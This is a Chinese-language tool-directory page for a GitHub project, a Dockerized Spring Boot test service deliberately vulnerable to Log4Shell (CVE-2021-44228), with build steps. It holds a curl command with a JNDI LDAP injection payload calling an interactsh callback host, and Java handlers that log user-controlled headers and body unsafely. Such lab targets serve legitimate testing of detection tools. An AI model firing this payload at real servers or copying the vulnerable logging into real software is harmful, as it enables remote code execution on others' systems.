Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Log4J-Log4Shell-CVE-2021-44228-Spring-Boot-Test-Service — Docker化的Spring Boot服务,故意易受Log4Shell(CVE-2021-44228)攻击,用于在本地环境中测试检测工具、载荷和漏洞利用能力。 | Kitploit
工具/GitHubGitHub/zsolt-halo/log4j-log4shell-cve-2021-44228-spring-boot-test-service
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育实验室与实践
GitHubzsolt-halo/log4j-log4shell-cve-2021-44228-spring-boot-test-service

Log4J-Log4Shell-CVE-2021-44228-Spring-Boot-Test-Service

Docker化的Spring Boot服务,故意易受Log4Shell(CVE-2021-44228)攻击,用于在本地环境中测试检测工具、载荷和漏洞利用能力。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
13224年前尚未审核
分享

CVE-2021-44228 Spring Boot 测试服务

这是一个临时拼凑的 Spring Boot Hello World 项目,用于在攻击生产环境目标之前,先在本地测试你的工具/载荷/检测能力。

配置的 Log4j 版本为 2.13.0

构建 Docker 镜像

root@kitploit:~
bash build.sh

运行 Docker 镜像

root@kitploit:~
docker run -p 8080:8080 dwdi/log4shell

测试 / 触发 CVE-2021-44228

如果你没有在车库中运行 burp collaborator,可以访问此站点获得类似体验:https://interactsh.com

root@kitploit:~
curl -s --max-time 20 localhost:8080 -H 'User-Agent: ${jndi:ldap://<some_custom_identifier>.<your_generated_subdomain>.interactsh.com/a}' > /dev/null

扫描器工具

你也可以使用这个很棒的仓库进行本地/批量扫描:https://github.com/adilsoybali/Log4j-RCE-Scanner

触发位置

此漏洞的核心在于迫使易受攻击的日志框架记录用户可控的值。考虑到这一点,这个简单的虚拟应用支持两个 HTTP(GET/PUT)动词和多个注入位置:

root@kitploit:~
@GetMapping("/")
	public String index(HttpServletRequest request) {
		logger.info("Request URL: " + request.getRequestURL());
		logger.info("Request URI: " + request.getRequestURI());
		logger.info("Request Method: " + request.getMethod());
		logger.info("Request Query String: " + request.getQueryString());
		logger.info("Request Protocol: " + request.getProtocol());
		logger.info("Request Remote Address: " + request.getRemoteAddr());
		logger.info("Request Remote Host: " + request.getRemoteHost());
		logger.info("Request Remote Port: " + request.getRemotePort());
		logger.info("Request User Agent: " + request.getHeader("User-Agent"));
		return "Log4J2 is working!";
	}
root@kitploit:~
@PostMapping("/")
	public String post(HttpServletRequest request, @RequestBody String body) {
		logger.info("Request URL: " + request.getRequestURL());
		logger.info("Request URI: " + request.getRequestURI());
		logger.info("Request Method: " + request.getMethod());
		logger.info("Request Query String: " + request.getQueryString());
		logger.info("Request Protocol: " + request.getProtocol());
		logger.info("Request Remote Address: " + request.getRemoteAddr());
		logger.info("Request Remote Host: " + request.getRemoteHost());
		logger.info("Request Remote Port: " + request.getRemotePort());
		logger.info("Request User Agent: " + request.getHeader("User-Agent"));
		logger.info("Request Body: " + body); // mind the extra request body
		return "Log4J2 is working!";
	}

欢迎贡献/改进。

抱歉代码质量不佳 :) 这个项目不是为了炫耀,而是为了分享/提供帮助。

下载工具